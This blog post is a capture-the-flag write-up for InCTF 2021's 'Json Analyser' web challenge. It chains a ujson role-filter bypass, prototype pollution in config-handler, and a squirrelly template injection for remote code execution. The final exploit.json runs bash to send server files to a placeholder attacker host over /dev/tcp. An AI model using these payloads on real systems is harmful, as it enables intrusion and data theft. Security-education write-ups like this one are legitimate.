<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Json Analyser - InCTF Internationals 2021 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="tl;dr  Json_Interoperability - &#x2F;verify_roles?role&#x3D;supersuperuseruser\ud800&quot;,&quot;name&quot;:&quot;admin Prototype_Pollution - &amp;#123;&quot;constructor&quot;:&amp;#123;&quot;prototype&quot;:&amp;#123;&amp;quo">
<meta property="og:type" content="article">
<meta property="og:title" content="Json Analyser - InCTF Internationals 2021">
<meta property="og:url" content="http://example.com/2021/08/15/inCTFi21-JsonAnalyser/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="tl;dr  Json_Interoperability - &#x2F;verify_roles?role&#x3D;supersuperuseruser\ud800&quot;,&quot;name&quot;:&quot;admin Prototype_Pollution - &amp;#123;&quot;constructor&quot;:&amp;#123;&quot;prototype&quot;:&amp;#123;&amp;quo">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-08-14T18:30:00.000Z">
<meta property="article:modified_time" content="2021-08-15T17:01:56.133Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Prototype_Pollution">
<meta property="article:tag" content="Json_Interoperability">
<meta property="article:tag" content="InCTFi">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-inCTFi21-JsonAnalyser" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/08/15/inCTFi21-JsonAnalyser/" class="article-date">
  <time class="dt-published" datetime="2021-08-14T18:30:00.000Z" itemprop="datePublished">2021-08-15</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/Web-Exploitation/">Web Exploitation</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Json Analyser - InCTF Internationals 2021
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>tl;dr</strong></p>
<ul>
<li>Json_Interoperability - <code>/verify_roles?role=supersuperuseruser\ud800&quot;,&quot;name&quot;:&quot;admin</code></li>
<li>Prototype_Pollution - <code>&#123;&quot;constructor&quot;:&#123;&quot;prototype&quot;:&#123;&quot;test&quot;:&quot;123&quot;&#125;&#125;&#125;</code> in config-handler</li>
<li>rce - using squirrelly-js<span id="more"></span></li>
</ul>
<p><strong>Challenge points:</strong> 1000</p>
<p><strong>Challenge Author:</strong> <a target="_blank" rel="noopener" href="https://twitter.com/_1nt3rc3pt0r_">1nt3rc3pt0r</a></p>
<p><strong>Source Code:</strong> <a target="_blank" rel="noopener" href="https://github.com/sayoojbkumar/CTFChallenges">here</a></p>
<h2 id="Challenge-Description"><a href="#Challenge-Description" class="headerlink" title="Challenge Description"></a>Challenge Description</h2><p>Welcome to JSON Analyser. Verify your role and get Subscription ID. Then start looking into your dump json file.</p>
<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><p><strong>Part - I:</strong></p>
<p>Looking into the source, one can find that the player has to get subscription_code first inorder to upload a Json file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">if &quot;superuser&quot; in role:</span><br><span class="line">    role=role.replace(&quot;superuser&quot;,&#x27;&#x27;)</span><br><span class="line">if &quot; &quot; in role:</span><br><span class="line">    return &quot;n0 H3ck1ng&quot;</span><br><span class="line">if len(role)&gt;30:</span><br><span class="line">    return &quot;invalid role&quot;</span><br><span class="line">data=&#x27;&quot;name&quot;:&quot;user&quot;,&quot;role&quot;:&quot;&#123;0&#125;&quot;&#x27;.format(role)</span><br><span class="line">no_hecking=re.search(r&#x27;&quot;role&quot;:&quot;(.*?)&quot;&#x27;,data).group(1)</span><br><span class="line">if(no_hecking)==None:</span><br><span class="line">    return &quot;bad data :(&quot;</span><br><span class="line">if no_hecking == &quot;superuser&quot;:</span><br><span class="line">    return &quot;n0 H3ck1ng&quot;</span><br><span class="line">data=&#x27;&#123;&#x27;+data+&#x27;&#125;&#x27;</span><br><span class="line">try:</span><br><span class="line">    user_data=ujson.loads(data)</span><br><span class="line">except:</span><br><span class="line">    return &quot;bad format&quot; </span><br></pre></td></tr></table></figure>

<p>The goal is to bypass waf and get subscription_code.</p>
<p>Payload:</p>
<ul>
<li><code>/verify_roles?role=supersuperuseruser\ud800&quot;,&quot;name&quot;:&quot;admin</code> </li>
<li>This happens because of <code>Character Truncation</code> while using ujson and <code>last-key precedence</code> when duplicate keys exists.   <a target="_blank" rel="noopener" href="https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities">read_more_about_this</a></li>
</ul>
<p><strong>Part - II:</strong></p>
<p>After retrieving subscription_code, players can now upload their json file providing subscription_code and get it’s preview</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">if(req.body.pin !== &quot;673307-0496-1001122&quot;)&#123;</span><br><span class="line">    return res.send(&#x27;bad pin&#x27;)</span><br><span class="line">&#125;</span><br><span class="line">if (!req.files || Object.keys(req.files).length === 0) &#123;</span><br><span class="line">  return res.status(400).send(&#x27;No files were uploaded.&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">uploadFile = req.files.uploadFile;</span><br><span class="line">uploadPath = __dirname + &#x27;/package.json&#x27; ;</span><br><span class="line">uploadFile.mv(uploadPath, function(err) &#123;</span><br><span class="line">    if (err)</span><br><span class="line">        return res.status(500).send(err);</span><br><span class="line">    try&#123;</span><br><span class="line">        var config = require(&#x27;config-handler&#x27;)();</span><br><span class="line">    &#125;</span><br><span class="line">    catch(e)&#123;</span><br><span class="line">        const src = &quot;package1.json&quot;;</span><br><span class="line">        const dest = &quot;package.json&quot;;</span><br><span class="line">        fs.copyFile(src, dest, (error) =&gt; &#123;</span><br><span class="line">            if (error) &#123;</span><br><span class="line">                console.error(error);</span><br><span class="line">                return;</span><br><span class="line">            &#125;</span><br><span class="line">            console.log(&quot;Copied Successfully!&quot;);</span><br><span class="line">        &#125;);</span><br><span class="line">        return res.sendFile(__dirname+&#x27;/static/error.html&#x27;)</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>as you can see <code>package.json</code> file is replaced with uploaded file and then it’s been loaded by <code>var config = require(&#39;config-handler&#39;)();</code></p>
<p>config-handler is vulnerable to Prototype_Pollution</p>
<p><code>poc.json</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">&quot;constructor&quot;:&#123;</span><br><span class="line">    &quot;prototype&quot;:</span><br><span class="line">        &#123;&quot;test&quot;:&quot;works&quot;&#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>poc.js</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">const express = require(&#x27;express&#x27;);</span><br><span class="line">const app = express();</span><br><span class="line">port = 8081</span><br><span class="line"></span><br><span class="line">app.get(&#x27;/&#x27;, function (req, res) &#123;</span><br><span class="line">    const config = require(&#x27;config-handler&#x27;)();</span><br><span class="line">    console.log(test)</span><br><span class="line">    console.log(config)</span><br><span class="line">&#125;);</span><br><span class="line">var server= app.listen(port, () =&gt; &#123;</span><br><span class="line">    console.log(`Example app listening at http://localhost:$&#123;port&#125;`)</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>


<p><strong>Part - III:</strong></p>
<p>From the Dockerfile it’s clear that user needs to get RCE inorder to retrieve flag. Now players need to Leverage the Prototype Pollution in <code>config-handler</code> to gain RCE using <code>squirrelly-js</code> module.</p>
<p><code>exploit.json</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &quot;name&quot;: &#123;</span><br><span class="line">      &quot;__proto__&quot;:&#123;</span><br><span class="line">         &quot;defaultFilter&quot; : &quot;e&#x27;));process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;/bin/bash -c \\&#x27;cat /* &gt; /dev/tcp/&lt;ip&gt;/&lt;port&gt;\\&#x27;&#x27;)//&quot;</span><br><span class="line">      &#125;</span><br><span class="line">     &#125;,</span><br><span class="line">    &quot;version&quot;: &quot;1.0.0&quot;,</span><br><span class="line">    &quot;description&quot;: &quot;&quot;,</span><br><span class="line">    &quot;main&quot;: &quot;app.js&quot;,</span><br><span class="line">    &quot;dependencies&quot;: &#123;</span><br><span class="line">      &quot;config-handler&quot;: &quot;^2.0.3&quot;,</span><br><span class="line">      &quot;express&quot;: &quot;^4.17.1&quot;,</span><br><span class="line">      &quot;express-fileupload&quot;: &quot;^1.2.1&quot;,</span><br><span class="line">      &quot;nodemon&quot;: &quot;^2.0.12&quot;,</span><br><span class="line">      &quot;squirrelly&quot;: &quot;^8.0.8&quot;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;devDependencies&quot;: &#123;&#125;,</span><br><span class="line">    &quot;scripts&quot;: &#123;</span><br><span class="line">      &quot;test&quot;: &quot;echo \&quot;Error: no test specified\&quot; &amp;&amp; exit 1&quot;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;author&quot;: &quot;&quot;,</span><br><span class="line">    &quot;license&quot;: &quot;ISC&quot;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>Why defaultFilter? <a target="_blank" rel="noopener" href="https://github.com/squirrellyjs/squirrelly/blob/master/src/compile-string.ts#L128">see_here</a></p>
<h2 id="Flag"><a href="#Flag" class="headerlink" title="Flag:"></a>Flag:</h2><p>inctf{Pr0707yp3_P011u710n5_4r3_D34dly}</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/08/15/inCTFi21-JsonAnalyser/" data-id="cksdght4t00011ocpfor69due" data-title="Json Analyser - InCTF Internationals 2021" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/InCTFi/" rel="tag">InCTFi</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Json-Interoperability/" rel="tag">Json_Interoperability</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Prototype-Pollution/" rel="tag">Prototype_Pollution</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2021/06/03/illusion-pwn2win2021/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">illusion - pwn2win 2021</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Web-Exploitation/">Web Exploitation</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/InCTFi/" rel="tag">InCTFi</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Json-Interoperability/" rel="tag">Json_Interoperability</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Prototype-pollution/" rel="tag">Prototype pollution</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Prototype-Pollution/" rel="tag">Prototype_Pollution</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/InCTFi/" style="font-size: 10px;">InCTFi</a> <a href="/tags/Json-Interoperability/" style="font-size: 10px;">Json_Interoperability</a> <a href="/tags/Prototype-pollution/" style="font-size: 10px;">Prototype pollution</a> <a href="/tags/Prototype-Pollution/" style="font-size: 10px;">Prototype_Pollution</a> <a href="/tags/RCE/" style="font-size: 10px;">RCE</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">August 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">June 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/08/15/inCTFi21-JsonAnalyser/">Json Analyser - InCTF Internationals 2021</a>
          </li>
        
          <li>
            <a href="/2021/06/03/illusion-pwn2win2021/">illusion - pwn2win 2021</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2021 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>